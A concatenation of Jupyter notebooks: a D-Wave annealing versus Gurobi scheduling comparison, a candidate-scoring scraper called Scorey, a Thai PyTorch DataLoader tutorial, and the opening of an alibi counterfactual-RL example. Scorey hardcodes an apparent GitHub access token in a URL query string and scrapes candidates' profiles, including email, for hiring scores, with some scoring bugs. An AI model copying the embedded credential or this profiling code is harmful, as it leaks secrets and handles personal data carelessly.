z_q = pyqubo.Array.create('z', shape=n*(2*n-1), vartype='BINARY')
# Definition of decision variable y
y_q = z_to_y(mdrrt, z_q)
# Make the objective function (6) using pyqubo
# Note that you don't need to include constraints here according to (7) and (8).
objective_function = make_objective_function(mdrrt, y_q)
model = objective_function.compile()
# Make the Binary Quadratic Model for D-Wave.
bqm = model.to_bqm()
bqm.normalize()
```
#### Input bqm into D-Wave or Simulated Annealing.
```
# Set the endpoint, token and solver for the experiments.
# You need to register D-Wave Leap account.
# (If you use Simulated Annealing altenatively, please ignore this block.)
endpoint = 'https://cloud.dwavesys.com/sapi' # change according to your account.
token = '***' # change according to your account.
solver = 'Advantage_system1.1' # change according to your account.
child_sampler = DWaveSampler(
endpoint=endpoint,
token=token,
solver=solver
)
sampler = EmbeddingComposite(child_sampler)
# If you use Simulated Annealing altenatively, run following block.
# (If you use D-Wave Machine, please ignore this block.)
sampler = neal.SimulatedAnnealingSampler()
# If you use D-Wave Machine, set the appropriate parameters here
num_reads = 1000
annealing_time = 50
sampleset = sampler.sample(
bqm,
annealing_time = annealing_time, #If you use SA, comment out this line.
num_reads = num_reads
)
sampleset = sampleset.aggregate()
# Pick up top 3 solutions.
data_list = [data for i, data in enumerate(sampleset.data(sorted_by='energy')) if i <3]
break_term_c = objective_function.compile()
samples = break_term_c.decode_sampleset(sampleset)
sample = min(samples, key=lambda s: s.energy)
num_breaks_qa = int(sample.energy)
```
#### Result
```
print("num of breaks (D-Wave or SA):", num_breaks_qa)
```
# MDRRT experiments by Integer Programming (Urdaneta)
```
model, y = urdaneta_BMP(
mdrrt,
timeout=300,
model_name='Urdaneta_BMP'
)
num_breaks_urdaneta = round(model.objval)
calculation_time = model.Runtime
print("num of broken (Urdaneta):", num_breaks_urdaneta)
print(f'time (Urdaneta): {round(calculation_time, 7)} seconds')
```
# MDRRT experiments by Integer Programming (Trick)
```
model, athome = trick_BMP(
mdrrt,
timeout=300,
model_name='Trick_BMP'
)
calculation_time = model.Runtime
gb_answer = np.zeros((mdrrt.num_teams, mdrrt.num_slots), int)
for i in range(mdrrt.num_teams):
for t in range(mdrrt.num_slots):
try:
temp = athome[i][t].getValue() if isinstance(athome[i][t], gurobipy.LinExpr) else athome[i][t].X
gb_answer[i][t] = round(temp, 2)
except AttributeError:
break
num_breaks_trick = 0
for i in range(mdrrt.num_teams):
prev = None
for t in gb_answer[i]:
if prev == t:
num_breaks_trick += 1
prev = t
print(f'breaks (Trick): {num_breaks_trick}')
print(f'time (Trick): {round(calculation_time, 7)} seconds')
```
# Compare methods
The calculation time for Gurobi to reach the objective function value which the D-Wave Advantage reaches in 0.05 s.
```
#Terminate if IP(urdaneta) find the better solution than QA.
#solve the problem using gurobi(IP(urdaneta))
model,y = urdaneta_BMP(
mdrrt,
timeout=None,
model_name='Urdaneta_BMP',
best_obj_stop=num_breaks_qa
)
urdaneta_time = model.Runtime
print(f"time: {round(urdaneta_time,7)} seconds")
```
| github_jupyter |
# Scorey
- Scraping, aggregating and assessing technical ability of a candidate based on publicly available sources
## Problem Statement
The current interview scenario is biased towards "candidate's performance during the 2 hour interview" and doesn't take other factors into account such as candidate's competitive coding abilities, contribution towards developer community and so on.
## Approach
Scorey tries to solve this problem by aggregating publicly available data from various websites such as
* Github
* StackOverflow
* CodeChef
* Codebuddy
* Codeforces
* Hackerearth
* SPOJ
* GitAwards
Once the data is collected, the algorithm then defines a comprehensive scoring system that grades the candidates technical capablities based on following factors
- Ranking
- Number of Problems Solved
- Activity
- Reputation
- Contribution
- Followers
The candidate is then assigned a scored out of 100 <br>
This helps the interviewer get a full view of candidates abilties and therefore helps them make a unbiased, informed decision.
-------
## ( Initial Setup )
```
def color_negative_red(val):
"""
Takes a scalar and returns a string with
the css property `'color: red'` for negative
strings, black otherwise.
"""
color = 'red' if val > 0 else 'black'
return 'color: %s' % color
# Set CSS properties for th elements in dataframe
th_props = [
('font-size', '15px'),
('text-align', 'center'),
('font-weight', 'bold'),
('color', '#00c936'),
('background-color', '##f7f7f7')
]
# Set CSS properties for td elements in dataframe
td_props = [
('font-size', '15px'),
('font-weight', 'bold')
]
# Set table styles
styles = [
dict(selector="th", props=th_props),
dict(selector="td", props=td_props)
]
```
-------
## Candidate's Username
- This information can be extracted in two ways <br>
- Parsing the resume
- Adding additional fields in the job application form
- Scrape it from personal website
```
import urllib.request
import requests
#return requests.get(url).json()
import json
import csv
serviceurl = 'https://api.github.com/users/'
#user = 'poke19962008'
user = input('Enter candidates username - ')
```
## Extracting all possible links/ usernames from personal website
```
from bs4 import BeautifulSoup
import urllib
import urllib.parse
import urllib.request
from urllib.request import urlopen
url = input('Enter your personal website - ')
html = urlopen(url).read()
soup = BeautifulSoup(html, "lxml")
tags = soup('a')
for tag in tags:
print (tag.get('href',None))
```
## 1. Github
```
user = 'poke19962008'
#user = raw_input('Enter user_name : ')
#if len(user) < 1 : break
serviceurl += user +'?'
access_token = "0b330104cd6dc94a8c29afb28a77ee8398e1c77b"
url = serviceurl + urllib.parse.urlencode({'access_token': access_token})
print('Retrieving', url)
uh = urllib.request.urlopen(url)
data = uh.read()
#print data
#js = json.loads(str(data))
js = json.loads(data.decode("utf-8"))
js
import pandas as pd
df = pd.DataFrame.from_dict(js, orient='columns')
df = df.iloc[3:]
df
df_new = df.filter(['email','public_repos','followers','hireable','company','updated_at'], axis=1)
(df_new.style
.set_table_styles(styles))
#json.dumps(js, indent=4)
# df['public_repos'] = js['public_repos']
# #df['total_private_repos'] = js['total_private_repos']
# df['followers'] = js['followers']
# df['hireable'] = js['hireable']
# df['company'] = js['company']
# df['updated_at'] = js['updated_at']
print("Number of public repositores - ", js['public_repos'])
#print("Number of private repositores - ", js['total_private_repos'])
print("Number of followers - ", js['followers'])
print("Is candidate looking for job? - ", js['hireable'])
print("Company - ", js['company'])
print("Last seen - ", js['updated_at'])
```
--------
## 2. StackOverflow
```
import stackexchange
so = stackexchange.Site(stackexchange.StackOverflow)
u = so.user('1600172')
print('reputation is' , u.reputation.format())
print('no of questions answered - ', u.answers.count)
df_new['stack_reputation'] = u.reputation.format()
df_new['stack_answer_count'] = u.answers.count
df_new.set_index('email')
(df_new.style
.set_table_styles(styles))
```
--------
## 3. CodeChef
```
import requests
from bs4 import BeautifulSoup
head = "https://wwww.codechef.com/users/"
var = user
URL = head + user
page = requests.get(URL)
soup = BeautifulSoup(page.content,'html.parser')
#These three lines give the Rating of the user.
listRating = list(soup.findAll('div',class_="rating-number"))
rating = list(listRating[0].children)
rating = rating[0]
print ("Rating: "+rating)
df_new['CodeChef_rating'] = rating
listGCR = [] #Global and country ranking.
listRanking = list(soup.findAll('div',class_="rating-ranks"))
rankingSoup = listRanking[0]
for item in rankingSoup.findAll('a'):
listGCR.append(item.get_text()) #Extracting the text from all anchor tags
print ("Global Ranking: "+listGCR[0])
df_new['CodeChef_global_rank'] = listGCR[0]
print ("Country Ranking: "+listGCR[1])
df_new['CodeChef_Country_rank'] = listGCR[1]
(df_new.style
.set_table_styles(styles))
```
--------
## 4. Spoj
```
import requests
import bs4 as bs
#url = input('enter spoj profile url - ')
url = 'https://www.spoj.com/users/poke19962008/'
sauce = urllib.request.urlopen(url).read()
soup = bs.BeautifulSoup(sauce,'lxml') # lxml is a parser
#print(soup)
info = (soup.find_all('p'))
for i in info:
print(i.text)
no_of_questions = int(soup.find('dd').text)
print(" no. of questions = ",no_of_questions)
df_new['SPOJ_no_of_ques'] = no_of_questions
(df_new.style
.set_table_styles(styles))
```
## 5. Codebuddy
```
import requests
from bs4 import BeautifulSoup
def codebuddy(username):
URL = "https://codebuddy.co.in/ranks/practice"
page = requests.get(URL)
soup = BeautifulSoup(page.content,'html.parser')
table = list(soup.find_all('tr'))
for i in table:
parameters = list(i.find_all('label'))
#print (i.find('label',class_="highlight").text)
if str(parameters[1].text)==username:
output = str(int(parameters[0].text))+" "+str(int(parameters[2].text))+" "+str(float(parameters[3].text))
return (output)
return (-1)
#ranking out of 2000
a = codebuddy("spectrum").split(" ")
a = pd.DataFrame(a)
a = a.transpose()
df_new['Codebuddy_rank'] = a[0].values
df_new['Codebuddy_problem_solved'] = a[1].values
df_new['Codebuddy_points'] = a[2].values
(df_new.style
.set_table_styles(styles))
```
-------
## 6. Hackerearth
```
import bs4 as bs
import urllib.request
#url = input('enter hackerearth profile url - ')
url = 'https://www.hackerearth.com/@poke19962008'
sauce = urllib.request.urlopen(url).read()
soup = bs.BeautifulSoup(sauce,'lxml') # lxml is a parser
#print(soup)
name = soup.find('h1', class_="name ellipsis larger")
print(name)
followersNo = soup.find('span', class_="track-followers-num")
followingNo = soup.find('span', class_="track-following-num")
print("No. of followers = ",followersNo)
print("No. of following = ",followingNo)
```
-------
## 7. CodeForces
```
def codeforces(username):
head = 'http://codeforces.com/profile/'
var = username
URL = head + var
page = requests.get(URL)
soup = BeautifulSoup(page.content,'html.parser')
listRating = list(soup.findAll('div',class_="user-rank"))
CheckRating = listRating[0].get_text() #Check for rated or unrated
if str(CheckRating) == '\nUnrated \n':
# print('Not rated')
out = 1000000
return(out)
else:
# print('rated')
listinfo = list((soup.find('div',class_="info")).findAll('li'))
string = (listinfo[0].get_text())
string = string.replace(" ","")
str1,str2 = string.split('(')
str3,str4 = str1.split(':')
out = int((str4.strip()))
return(out)
df_new['CodeForce_ranking'] = codeforces('user')
(df_new.style
.set_table_styles(styles))
```
-------
## 8. Git-Awards Ranking
```
import requests
from bs4 import BeautifulSoup
import re
head = "http://git-awards.com/users/"
var = user
URL = head + var
page = requests.get(URL)
soup = BeautifulSoup(page.content,'html.parser')
a = list(soup.findAll('div',class_='col-md-3 info'))
b = list(soup.findAll('td'))
lang=[]
f = 0
for i in a:
c = i.text.lstrip().rstrip()
if 'your ranking' in c and f==0:
f=1
continue
if 'ranking' in c:
s=""
d = c.split(" ")
for j in d:
if j!="ranking":
s+=j+" "
lang.append(s.rstrip())
print(lang)
df_new['lang_1'] = lang[0]
df_new['lang_2'] = lang[1]
df_new['lang_3'] = lang[2]
df_new['lang_4'] = lang[3]
(df_new.style
.set_table_styles(styles))
```
(If you want to know about their work)
```
#username = input('enter github username - ')
username = user
print("Loading...")
print()
url = "https://github.com/"+username
sauce = urllib.request.urlopen(url).read()
soup = bs.BeautifulSoup(sauce,'lxml') # lxml is a parser
#print(soup)
repoNo = int(soup.find('span',class_='Counter').text)
n1 = repoNo
print("No. of repositories = ",n1)
print()
url2 = url + "?tab=repositories"
sauce = urllib.request.urlopen(url2).read()
soup = bs.BeautifulSoup(sauce,'lxml')
#print(soup)
arr = [0]
tags = soup.find_all('a', itemprop="name codeRepository")
for tag in tags:
if tag.text!="":
arr.append((tag.text).lstrip())
k=2
while(len(arr)<=n1):
url3 = url + "?page="+str(k)+"&tab=repositories"
k+=1
sauce = urllib.request.urlopen(url3).read()
soup = bs.BeautifulSoup(sauce,'lxml')
tags = soup.find_all('a', itemprop="name codeRepository")
for tag in tags:
if tag.text!="":
arr.append((tag.text).lstrip())
for i in range(1,len(arr)):
h1 = str(i) + ". "+str(arr[i])
print(h1)
(df_new.style
.set_table_styles(styles))
df_new.to_csv("final_data.csv")
```
--------
## Scoring
Next part is to score the candidates on following parameters -
- Rank (25)
- Number of problems solved (25)
- Reputation (25)
- Followers (15)
- Activity (5)
- Contributions (5)
```
df_new['stack_reputation']= df_new['stack_reputation'].apply(pd.to_numeric)
df_new['CodeChef_rating']= df_new['CodeChef_rating'].apply(pd.to_numeric)
df_new['Codebuddy_points']= df_new['Codebuddy_points'].apply(pd.to_numeric)
df_new['stack_answer_count']= df_new['stack_answer_count'].apply(pd.to_numeric)
df_new['SPOJ_no_of_ques']= df_new['SPOJ_no_of_ques'].apply(pd.to_numeric)
df_new['Codebuddy_problem_solved']= df_new['Codebuddy_problem_solved'].apply(pd.to_numeric)
df_new['CodeChef_global_rank']= df_new['CodeChef_global_rank'].apply(pd.to_numeric)
df_new['CodeChef_Country_rank']= df_new['CodeChef_Country_rank'].apply(pd.to_numeric)
df_new['Codebuddy_rank']= df_new['Codebuddy_rank'].apply(pd.to_numeric)
df_new['CodeForce_ranking']= df_new['CodeForce_ranking'].apply(pd.to_numeric)
df_res = df_new.filter(['email'], axis=1)
```
## 1. Reputation
```
df_new.loc[ df_new['stack_reputation'] >= 360 , 'score_rep_1'] = 10
df_new.loc[ (df_new['stack_reputation'] < 359) & (df_new['stack_reputation'] >= 150) , 'score_rep_1'] = 5
df_new.loc[ (df_new['stack_reputation'] < 149) & (df_new['stack_reputation'] >= 100) , 'score_rep_1'] = 2
df_new.loc[ df_new['CodeChef_rating'] > 1500 , 'score_rep_2'] = 10
df_new.loc[ (df_new['CodeChef_rating'] < 1499) & (df_new['CodeChef_rating'] >= 1000) , 'score_rep_2'] = 5
df_new.loc[ (df_new['CodeChef_rating'] < 999) & (df_new['CodeChef_rating'] >= 500) , 'score_rep_2'] = 2
df_new.loc[ df_new['Codebuddy_points'] > 100 , 'score_rep_3'] = 5
df_new.loc[ (df_new['Codebuddy_points'] < 99) & (df_new['Codebuddy_points'] >= 50) , 'score_rep_3'] = 2
df_new.loc[ (df_new['Codebuddy_points'] < 49) & (df_new['Codebuddy_points'] >= 20) , 'score_rep_3'] = 1
df_res['score_rep'] = df_new['score_rep_1'] + df_new['score_rep_2'] + df_new['score_rep_3']
df_res
```
-----
## 2. Number of Problems Solved
```
df_new.loc[ df_new['stack_answer_count'] >= 20 , 'score_ps_1'] = 9
df_new.loc[ (df_new['stack_answer_count'] < 20) & (df_new['stack_answer_count'] >= 10) , 'score_ps_1'] = 5
df_new.loc[ (df_new['stack_answer_count'] < 10) & (df_new['stack_answer_count'] >= 5) , 'score_ps_1'] = 3
df_new.loc[ df_new['SPOJ_no_of_ques'] >= 10 , 'score_ps_2'] = 8
df_new.loc[ (df_new['SPOJ_no_of_ques'] < 9) & (df_new['SPOJ_no_of_ques'] >= 5) , 'score_ps_2'] = 4
df_new.loc[ (df_new['SPOJ_no_of_ques'] < 5) & (df_new['SPOJ_no_of_ques'] >= 2) , 'score_ps_2'] = 2
df_new.loc[ df_new['Codebuddy_problem_solved'] >= 50 , 'score_ps_3'] = 8
df_new.loc[ (df_new['Codebuddy_problem_solved'] < 49) & (df_new['Codebuddy_problem_solved'] >= 25) , 'score_ps_3'] = 4
df_new.loc[ (df_new['Codebuddy_problem_solved'] < 24) & (df_new['Codebuddy_problem_solved'] >= 10) , 'score_ps_3'] = 2
df_res['score_ps'] = df_new['score_ps_1'] + df_new['score_ps_2'] + df_new['score_ps_3']
df_res
```
------
## 3. Ranking
```
df_new.loc[ df_new['CodeChef_global_rank'] <= 5000 , 'score_rank_1'] = 7
df_new.loc[ (df_new['CodeChef_global_rank'] > 5000) & (df_new['CodeChef_global_rank'] <= 15000) , 'score_rank_1'] = 4
df_new.loc[ (df_new['CodeChef_global_rank'] > 15000) & (df_new['CodeChef_global_rank'] <= 25000) , 'score_rank_1'] = 2
df_new.loc[ df_new['CodeChef_Country_rank'] <= 2000 , 'score_rank_2'] = 6
df_new.loc[ (df_new['CodeChef_Country_rank'] > 2000) & (df_new['CodeChef_Country_rank'] <= 7000) , 'score_rank_2'] = 3
df_new.loc[ (df_new['CodeChef_Country_rank'] > 7000) & (df_new['CodeChef_Country_rank'] <= 15000) , 'score_rank_2'] = 1
df_new.loc[ df_new['Codebuddy_rank'] <= 50 , 'score_rank_3'] = 6
df_new.loc[ (df_new['Codebuddy_rank'] > 50) & (df_new['Codebuddy_rank'] <= 250) , 'score_rank_3'] = 3
df_new.loc[ (df_new['Codebuddy_rank'] > 250) & (df_new['Codebuddy_rank'] <= 500) , 'score_rank_3'] = 1
df_new.loc[ df_new['CodeForce_ranking'] <= 500 , 'score_rank_4'] = 6
df_new.loc[ (df_new['CodeForce_ranking'] > 500) & (df_new['CodeForce_ranking'] <= 2000) , 'score_rank_4'] = 3
df_new.loc[ (df_new['CodeForce_ranking'] > 2000) & (df_new['CodeForce_ranking'] <= 5000) , 'score_rank_4'] = 1
df_res['score_rank'] = df_new['score_rank_1'] + df_new['score_rank_2'] + df_new['score_rank_3'] + df_new['score_rank_4']
df_res
```
-------
## 4. Activity
```
df_new['updated_at'] = df_new['updated_at'].apply(pd.to_datetime)
df_new['updated_at']
df_new['updated_at'] = df_new['updated_at'].dt.date
df_new['updated_at'] = df_new['updated_at'].apply(pd.to_datetime)
df_new['updated_at']
df_new['current_date'] = '2018-06-24'
df_new['current_date']= df_new['current_date'].apply(pd.to_datetime)
df_new['current_date']
from datetime import date
df_new['last_active'] = df_new['current_date'] - df_new['updated_at']
df_new['last_active'].astype(str)
df_new['last_active'] = df_new['last_active'].astype(str).str[0]
df_new['last_active']= df_new['last_active'].apply(pd.to_numeric)
df_new['last_active']
df_new.loc[df_new['last_active'] <= 7 , 'score_activity_1'] = 5
df_new.loc[ (df_new['last_active'] > 8) & (df_new['last_active'] <= 15) , 'score_activity_1'] = 3
df_new.loc[ (df_new['last_active'] > 15) & (df_new['last_active'] <= 30) , 'score_activity_1'] = 1
df_res['score_activity'] = df_new['score_activity_1']
```
--------
## 5. Followers
```
df_new.loc[ df_new['followers'] >= 200 , 'score_followers_1'] = 15
df_new.loc[ (df_new['followers'] < 200) & (df_new['followers'] >= 50) , 'score_followers_1'] = 10
df_new.loc[ (df_new['followers'] < 50) & (df_new['followers'] >= 30) , 'score_followers_1'] = 5
df_res['score_followers'] = df_new['score_followers_1']
df_res
```
------
## 6. Contributions
```
df_new.loc[ df_new['public_repos'] >= 30 , 'score_con_1'] = 5
df_new.loc[ (df_new['followers'] < 30) & (df_new['followers'] >= 10) , 'score_con_1'] = 3
df_new.loc[ (df_new['followers'] < 10) & (df_new['followers'] >= 3) , 'score_con_1'] = 1
df_res['score_contributions'] = df_new['score_con_1']
df_res
```
-------
## 7. Final Score
```
df_res['total_score'] = df_res['score_rep'] + df_res['score_ps'] + df_res['score_rank'] + df_res['score_activity'] + df_res['score_followers'] + df_res['score_contributions']
(df_res.style
.applymap(color_negative_red, subset=['total_score'])
.set_table_styles(styles))
```
-------
-------
## Demo
- Visualizing candidates perfomance throughs charts and graphs
-------
-------
## Tech Stack
- Python: BeautifulSoup, Urllib, Pandas, Scipy
- D3.js
-------
-------
## What's Next?
- Scorey for non technical recruitments - Sales, Marketing and HR
- Integrating Machine learning components for rule generation
- Handling missing data exceptions dynamically
-------
-------
Thank you!
| github_jupyter |
# 0. Magic
```
%load_ext autoreload
%autoreload 2
%matplotlib inline
```
# 1. Import
```
import torch
from torch import tensor
from torch import nn
import torch.nn.functional as F
from torch.utils import data
import matplotlib.pyplot as plt
from pathlib import Path
from IPython.core.debugger import set_trace
from fastai import datasets
from fastai.metrics import accuracy
import pickle, gzip, math, torch
import operator
```
# 2. Data
```
MNIST_URL='http://deeplearning.net/data/mnist/mnist.pkl'
def get_data():
path = datasets.download_data(MNIST_URL, ext='.gz')
with gzip.open(path, 'rb') as f:
((x_train, y_train), (x_valid, y_valid), _) = pickle.load(f, encoding='latin-1')
return map(tensor, (x_train, y_train, x_valid, y_valid))
x_train, y_train, x_valid, y_valid = get_data()
```
# 3. เตรียม Data
```
class Dataset(data.Dataset):
def __init__(self, x, y):
self.x, self.y = x, y
def __len__(self):
return len(self.x)
def __getitem__(self, i):
return self.x[i], self.y[i]
class DataLoader():
def __init__(self, ds, bs): self.ds,self.bs = ds,bs
def __iter__(self):
for i in range(0, len(self.ds), self.bs): yield self.ds[i:i+self.bs]
# x = data, m = mean, s = standard deviation
def normalize(x, m, s):
return (x-m)/s
n, m = x_train.shape
c = (y_train.max()+1).numpy()
n, m, c
train_mean, train_std = x_train.mean(), x_train.std()
x_train = normalize(x_train, train_mean, train_std)
x_valid = normalize(x_valid, train_mean, train_std)
# batch size
bs = 64
train_ds, valid_ds = Dataset(x_train, y_train), Dataset(x_valid, y_valid)
train_dl, valid_dl = DataLoader(train_ds, bs), DataLoader(valid_ds, bs)
```
# 4. สร้าง Model
Hyperparameter ของโมเดล
```
# learning rate
lr = 0.03
epoch = 1
nh = 50
```
ประกาศฟังก์ชันเอาไว้สร้างโมเดล
```
def get_model():
# loss function
loss_func = F.cross_entropy
model = nn.Sequential(nn.Linear(m, nh), nn.ReLU(), nn.Linear(nh,c))
return model, loss_func
```
# 5. Training Loop
เราจะเทรนโมเดล ด้วยอัลกอริทึม [Stochastic Gradient Descent (SGD)](https://www.bualabs.com/wp-admin/post.php?post=631&action=edit) และ เก็บ Loss, Accuracy เอาไว้พล็อตกราฟ
ประกาศฟังก์ชัน fit เอาไว้เรียกเทรนเวลาที่ต้องการ
```
def fit():
losses, metrics = [], []
# e = epoch number
for e in range(epoch):
for xb, yb in train_dl:
# Feedforward
yhatb = model(xb)
loss = loss_func(yhatb, yb)
# Metrics
acc = accuracy(yhatb, yb)
losses.append(loss); metrics.append(acc)
# Backpropagation
loss.backward()
optim.step()
optim.zero_grad()
plot_metrics(losses, metrics)
```
ประการฟัง์ชัน ไว้พล็อตกราฟ Loss และ Accuracy
```
def plot_metrics(losses, metrics):
x = torch.arange(len(losses)).numpy()
fig,ax = plt.subplots(figsize=(9, 9))
ax.grid(True)
ax.plot(x, losses, label="Loss")
ax.plot(x, metrics, label="Accuracy")
ax.legend(loc='upper right')
```
# 6. Refactor DataLoader
## 6.1 Random Sampler
ในการเทรนโมเดล เราควรสับเปลี่ยนกองข้อมูล เหมือนสับไพ่ ให้ลำดับข้อมูลตัวอย่างไม่เหมือนกันทุกครั้ง ก่อนที่จะป้อนให้กับโมเดล
```
class Sampler():
# ds = Dataset, bs = Batch Size, n = Length of Dataset
def __init__(self, ds, bs, shuffle=False):
self.n, self.bs, self.shuffle = len(ds), bs, shuffle
def __iter__(self):
self.idxs = torch.randperm(self.n) if self.shuffle else torch.arange(self.n)
for i in range(0, self.n, self.bs): yield self.idxs[i:i+self.bs]
small_ds = Dataset(*train_ds[:10])
```
เทสแบบไม่สับเปลี่ยน
```
s = Sampler(small_ds, 3, shuffle=False)
[o for o in s]
```
เทสแบบสับเปลี่ยน
```
s = Sampler(small_ds, 3, shuffle=True)
[o for o in s]
```
## 6.2 Collate
เมื่อเราสับเปลี่ยนข้อมูลออกมาจากกอง Dataset เป็น (x7, y7), (x3, y3), (x1, y1), (...) แล้ว เราต้องมีฟังก์ชันเล็ก ๆ ใน DataLoader ในการรวมเป็นกองเล็ก ๆ ขึ้นมาใหม่ เป็น Mini-Batch (x7, x3, x1, ...), (y7, y3, y1, ...) ก่อนส่งให้กับโมเดล
```
def collate(b):
xs, ys = zip(*b)
return torch.stack(xs), torch.stack(ys)
```
เพิ่ม Feature ให้กับ DataLoader ในการรับ Sampler และ Collate
```
class DataLoader2():
def __init__(self, ds, sampler, collate_fn=collate):
self.ds, self.sampler, self.collate_fn = ds, sampler, collate_fn
def __iter__(self):
for s in self.sampler: yield self.collate_fn([self.ds[i] for i in s])
```
เรามักจะ Shuffle ข้อมูล Training Set แต่ Validation Set ไม่จำเป็นต้อง Shuffle
```
train_samp = Sampler(train_ds, bs, shuffle=True)
valid_samp = Sampler(valid_ds, bs, shuffle=False)
# train_dl = Training Set DataLoader, valid_dl = Validation Set DataLoader
train_dl = DataLoader2(train_ds, train_samp, collate)
valid_dl = DataLoader2(valid_ds, valid_samp, collate)
xb, yb = next(iter(train_dl))
yb[0], plt.imshow(xb[0].view(28, 28))
xb, yb = next(iter(train_dl))
yb[0], plt.imshow(xb[0].view(28, 28))
model, loss_func = get_model()
optim = torch.optim.SGD(model.parameters(), lr=lr)
fit()
```
## 6.3 PyTorch DataLoader
```
from torch.utils import data
```
PyTorch DataLoader สามารถรับ shuffle=True/False หรือ รับเป็น class RandomSampler/SequentialSampler ก็ได้
```
# train_dl = data.DataLoader(train_ds, bs, shuffle=True, collate_fn=collate)
# valid_dl = data.DataLoader(valid_ds, bs, shuffle=False, collate_fn=collate)
train_dl = data.DataLoader(train_ds, bs, sampler=data.RandomSampler(train_ds), collate_fn=collate, num_workers=8)
valid_dl = data.DataLoader(valid_ds, bs, sampler=data.SequentialSampler(valid_ds), collate_fn=collate, num_workers=8)
```
เราสามารถ ใช้ num_workers เพื่อกำหนดให้ PyTorch DataLoader แตก SubProcess เพื่อช่วยโหลดข้อมูลแบบขนาน ทำให้โหลดข้อมูลขนาดใหญ่ได้เร็วขึ้น
```
model, loss_func = get_model()
optim = torch.optim.SGD(model.parameters(), lr=lr)
fit()
```
# 7. สรุป
1. ในการเทรนโมเดล แต่ละ Epoch เราไม่ควรป้อนข้อมูลเหมือน ๆ กันทุกครั้งให้โมเดล เราจึงได้สร้าง DataLoader เวอร์ชันใหม่ ที่จะสับไพ่ข้อมูลตัวอย่างก่อนป้อนให้โมเดล
1. ในการสับไพ่ข้อมูล จำเป็นต้องมีกระบวนการนำข้อมูลมารวมกันใหม่ เรียกว่า Collate
1. DataLoader ของ PyTorch จัดการปัญหาพวกนี้ให้เราหมด พร้อมทั้งมี Feature num_workers เพิ่มความเร็วในการโหลดข้อมูล แบบขนาน
# Credit
* https://course.fast.ai/videos/?lesson=9
* https://pytorch.org/docs/stable/data.html
```
```
| github_jupyter |
# Counterfactual with Reinforcement Learning (CFRL) on Adult Census
This method is described in [Model-agnostic and Scalable Counterfactual Explanations via Reinforcement Learning](https://arxiv.org/abs/2106.02597) and can generate counterfactual instances for any black-box model. The usual optimization procedure is transformed into a learnable process allowing to generate batches of counterfactual instances in a single forward pass even for high dimensional data. The training pipeline is model-agnostic and relies only on prediction feedback by querying the black-box model. Furthermore, the method allows target and feature conditioning.
**We exemplify the use case for the TensorFlow backend. This means that all models: the autoencoder, the actor and the critic are TensorFlow models. Our implementation supports PyTorch backend as well.**
CFRL uses [Deep Deterministic Policy Gradient (DDPG)](https://arxiv.org/abs/1509.02971) by interleaving a state-action function approximator called critic, with a learning an approximator called actor to predict the optimal action. The method assumes that the critic is differentiable with respect to the action argument, thus allowing to optimize the actor's parameters efficiently through gradient-based methods.
The DDPG algorithm requires two separate networks, an actor $\mu$ and a critic $Q$. Given the encoded representation of the input instance $z = enc(x)$, the model prediction $y_M$, the target prediction
$y_T$ and the conditioning vector $c$, the actor outputs the counterfactual’s latent representation $z_{CF} = \mu(z, y_M, y_T, c)$. The decoder then projects the embedding $z_{CF}$ back to the original input space,
followed by optional post-processing.
The training step consists of simultaneously optimizing the actor and critic networks. The critic regresses on the reward $R$ determined by the model prediction, while the actor maximizes the critic’s output for the given instance through $L_{max}$. The actor also minimizes two objectives to encourage the generation of sparse, in-distribution counterfactuals. The sparsity loss $L_{sparsity}$ operates on the decoded counterfactual $x_{CF}$ and combines the $L_1$ loss over the standardized numerical features and the $L_0$ loss over the categorical ones. The consistency loss $L_{consist}$ aims to encode the counterfactual $x_{CF}$ back to the same latent representation where it was decoded from and helps to produce in-distribution counterfactual instances. Formally, the actor's loss can be written as:
$L_{actor} = L_{max} + \lambda_{1}L_{sparsity} + \lambda_{2}L_{consistency}$
This example will use the [xgboost](https://github.com/dmlc/xgboost) library, which can be installed with:
```
!pip install xgboost
import os
import numpy as np
import pandas as pd
from copy import deepcopy
from typing import List, Tuple, Dict, Callable
import tensorflow as tf
import tensorflow.keras as keras
from sklearn.compose import ColumnTransformer
from sklearn.impute import SimpleImputer
from sklearn.preprocessing import StandardScaler, OneHotEncoder
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from xgboost import XGBClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression
from alibi.explainers import CounterfactualRLTabular, CounterfactualRL
from alibi.datasets import fetch_adult
from alibi.models.tensorflow.autoencoder import HeAE
from alibi.models.tensorflow.actor_critic import Actor, Critic
from alibi.models.tensorflow.cfrl_models import ADULTEncoder, ADULTDecoder
from alibi.explainers.cfrl_base import Callback
from alibi.explainers.backends.cfrl_tabular import get_he_preprocessor, get_statistics, \
get_conditional_vector, apply_category_mapping
```
### Load Adult Census Dataset
```
# Fetch adult dataset
adult = fetch_adult()
# Separate columns in numerical and categorical.
categorical_names = [adult.feature_names[i] for i in adult.category_map.keys()]
categorical_ids = list(adult.category_map.keys())
numerical_names = [name for i, name in enumerate(adult.feature_names) if i not in adult.category_map.keys()]
numerical_ids = [i for i in range(len(adult.feature_names)) if i not in adult.category_map.keys()]
# Split data into train and test
X, Y = adult.data, adult.target
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state=13)
```
### Train black-box classifier
```
# Define numerical standard scaler.
num_transf = StandardScaler()
# Define categorical one-hot encoder.
cat_transf = OneHotEncoder(
categories=[range(len(x)) for x in adult.category_map.values()],
handle_unknown="ignore"
)
# Define column transformer
preprocessor = ColumnTransformer(
transformers=[
("cat", cat_transf, categorical_ids),
("num", num_transf, numerical_ids),
],
sparse_threshold=0
)
# Fit preprocessor.
preprocessor.fit(X_train)
# Preprocess train and test dataset.
X_train_ohe = preprocessor.transform(X_train)
X_test_ohe = preprocessor.transform(X_test)
# Select one of the below classifiers.
# clf = XGBClassifier(min_child_weight=0.5, max_depth=3, gamma=0.2)
# clf = LogisticRegression(C=10)
# clf = DecisionTreeClassifier(max_depth=10, min_samples_split=5)
clf = RandomForestClassifier(max_depth=15, min_samples_split=10, n_estimators=50)
# Fit the classifier.
clf.fit(X_train_ohe, Y_train)
```
### Define the predictor (black-box)
Now that we've trained the classifier, we can define the black-box model. Note that the output of the black-box is a distribution which can be either a soft-label distribution (probabilities/logits for each class) or a hard-label distribution (one-hot encoding). Internally, CFRL takes the `argmax`. Moreover the output **DOES NOT HAVE TO BE DIFFERENTIABLE**.
```
# Define prediction function.
predictor = lambda x: clf.predict_proba(preprocessor.transform(x))
# Compute accuracy.
